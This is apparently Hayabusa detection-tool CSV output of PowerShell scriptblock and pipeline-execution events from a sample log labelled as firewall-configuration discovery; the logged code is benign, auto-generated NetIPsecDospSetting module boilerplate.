configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,")')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $fa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" 